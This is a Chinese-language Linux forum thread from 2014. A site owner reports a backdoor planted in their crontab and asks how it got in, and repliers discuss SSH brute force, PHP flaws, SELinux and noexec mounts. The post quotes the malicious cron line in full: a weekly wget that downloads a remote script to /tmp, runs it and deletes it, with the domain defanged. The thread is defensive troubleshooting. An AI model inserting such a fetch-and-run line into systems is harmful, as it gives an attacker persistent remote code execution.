[問題] 被植入後門

作者averywu (看文不要只會用橫的看)

看板Linux

標題[問題] 被植入後門

時間Wed Oct 1 11:18:48 2014

我的站台的crontab 被寫入 @weekly wget http://x/bots/regulat.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh > /dev/null 2&1 目前已知不影響主機，因為URL已經失效了。 PS.貼出來的URL已經處理過了，domain我改成x，以防被誤點。但實在找不出他植入的方法，有人知道嗎？ -- 小惡魔的家 http://blog.pixnet.net/shiuju/ -- -- ※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 60.251.237.155 ※ 文章網址: http://www.ptt.cc/bbs/Linux/M.1412133531.A.ED1.html ※ averywu:轉錄至看板 PHP 10/01 11:19

噓 kenduest: 這個還要查看其他點會比較好知道是哪邊引起的 10/01 15:43

→ kenduest: 常見比方帳號密碼被猜中這種暴力 ssh 登入進來的 10/01 15:43

→ kenduest: 或者是跑的 php 程式碼有問題這類 10/01 15:44

→ kenduest: 題外話若你是安裝 rh-based 的版本有開 selinux 的話 10/01 15:45

→ kenduest: 通常最後會因為 policy 設定不會允許 /tmp 內檔案執行 10/01 15:46

→ kenduest: 在 web server 環境上面的話比較能夠減少後續問題 10/01 15:47

→ dayyeah: sh /tmp/sh不就愛幹嘛幹嘛了嗎？他從regulat.bot抓下來 10/01 19:59

→ dou0228: /tmp 可以用 -o noexec 防止 sh /tmp/sh 10/03 00:02

→ danny8376: 樓上那是shell的行為不是所有shell都會檢查的 10/03 00:32

→ kenduest: noexec 比較適合於 binary 檔案，script 似乎就...... 10/03 13:24

→ dou0228: 嗯, 用 sh /tmp/xxx.sh 都不會被檔下 10/05 23:48